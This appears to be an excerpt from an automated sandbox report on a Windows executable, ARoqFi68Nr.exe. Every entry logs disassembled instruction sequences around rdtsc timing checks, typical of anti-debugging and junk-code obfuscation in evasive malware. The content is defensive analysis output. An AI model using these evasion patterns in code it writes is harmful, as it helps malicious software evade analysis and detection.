              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7824D7 second address: 7824DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78413E second address: 78414D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4BBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7862AB second address: 7862AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7862AF second address: 7862E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F9F08C2E4DAh 0x0000000c jmp 00007F9F08C2E4BCh 0x00000011 jmp 00007F9F08C2E4C8h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7862E3 second address: 7862F8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007F9F08C2F7D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78BF76 second address: 78BF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78BF7A second address: 78BF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78BF8F second address: 78BFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9F08C2E4C8h 0x0000000c jmp 00007F9F08C2E4C2h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C136 second address: 78C13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C13E second address: 78C144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C144 second address: 78C148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C148 second address: 78C14E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C14E second address: 78C15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9F08C2F7DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C2DC second address: 78C2E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C2E0 second address: 78C2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C2E6 second address: 78C2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C2EF second address: 78C2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 78C2F5 second address: 78C2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7922E4 second address: 7922EE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F08C2F7DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7922EE second address: 7922FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F9F08C2E4BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7922FF second address: 792303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 792303 second address: 792309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7923BB second address: 7923C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7923C1 second address: 7923D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4C4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796F6F second address: 796F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796F78 second address: 796F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796F7C second address: 796F9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796F9B second address: 796FA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796244 second address: 796248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796248 second address: 796267 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9F08C2E4B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9F08C2E4C3h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796267 second address: 796272 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F9F08C2F7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79655D second address: 796563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796563 second address: 796572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9F08C2F7D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796572 second address: 79657C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F08C2E4B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7969D8 second address: 7969F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E1h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7969F5 second address: 7969F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796CA1 second address: 796CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7E3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796CBA second address: 796CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BAh 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F9F08C2E4BEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 796CD6 second address: 796CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jns 00007F9F08C2F7D6h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76A5E1 second address: 76A5E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76A5E7 second address: 751888 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov cl, E1h 0x0000000e call dword ptr [ebp+122D1DD9h] 0x00000014 push ebx 0x00000015 push ecx 0x00000016 jmp 00007F9F08C2F7E5h 0x0000001b pop ecx 0x0000001c jl 00007F9F08C2F7DEh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AB3B second address: 76AB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AC48 second address: 76ACC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push edi 0x00000015 push eax 0x00000016 jmp 00007F9F08C2F7E1h 0x0000001b pop eax 0x0000001c pop edi 0x0000001d pop eax 0x0000001e or edi, 0C0CF061h 0x00000024 call 00007F9F08C2F7D9h 0x00000029 jnl 00007F9F08C2F7F7h 0x0000002f push eax 0x00000030 push esi 0x00000031 jno 00007F9F08C2F7D8h 0x00000037 pop esi 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c push eax 0x0000003d push edx 0x0000003e je 00007F9F08C2F7DCh 0x00000044 jc 00007F9F08C2F7D6h 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76ACC5 second address: 76ACE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F08C2E4C2h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76ACE3 second address: 76ACE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76ACE9 second address: 76ACED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AE23 second address: 76AE27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AE27 second address: 76AE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 mov dword ptr [ebp+122D3C75h], edi 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AE3D second address: 76AE42 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76AF8F second address: 76AFB4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F08C2E4CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B0DC second address: 76B0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B0E0 second address: 76B133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F9F08C2E4B6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+12483C0Dh], ecx 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F9F08C2E4B8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 pushad 0x00000034 mov dword ptr [ebp+122D3AB8h], ebx 0x0000003a movzx ecx, si 0x0000003d popad 0x0000003e nop 0x0000003f pushad 0x00000040 jp 00007F9F08C2E4B8h 0x00000046 push edx 0x00000047 pop edx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B537 second address: 76B540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B540 second address: 76B55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb edi, 5964CEB2h 0x0000000e push 0000001Eh 0x00000010 nop 0x00000011 push ecx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B87C second address: 76B897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2F7E7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B897 second address: 76B89B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B97C second address: 76B982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A46F second address: 79A475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8B9 second address: 79A8C6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9F08C2F7D8h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8C6 second address: 79A8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a js 00007F9F08C2E4B6h 0x00000010 ja 00007F9F08C2E4B6h 0x00000016 jnl 00007F9F08C2E4B6h 0x0000001c jl 00007F9F08C2E4B6h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8ED second address: 79A8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8F3 second address: 79A8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8F7 second address: 79A8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AA4B second address: 79AA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AA51 second address: 79AA5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AA5D second address: 79AA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9F08C2E4B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AD72 second address: 79AD76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AD76 second address: 79AD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AD7F second address: 79ADA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F08C2F7E9h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79ADA4 second address: 79ADB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F9F08C2E4B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AF2C second address: 79AF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AF30 second address: 79AF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a jnl 00007F9F08C2E4C5h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9F08C2E4BDh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79E585 second address: 79E5B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E3h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9F08C2F7E3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79E5B5 second address: 79E5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79E5B9 second address: 79E5D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 731159 second address: 73115F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73115F second address: 731163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 731163 second address: 731176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 731176 second address: 73117B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A27AC second address: 7A27B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A2919 second address: 7A292F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9F08C2F7E0h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A292F second address: 7A2938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A2938 second address: 7A293E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A293E second address: 7A2944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3056 second address: 7A306B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7DAh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A306B second address: 7A306F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A306F second address: 7A3091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7E9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A336A second address: 7A3370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3370 second address: 7A3386 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F08C2F7E0h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3386 second address: 7A338C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A338C second address: 7A3390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
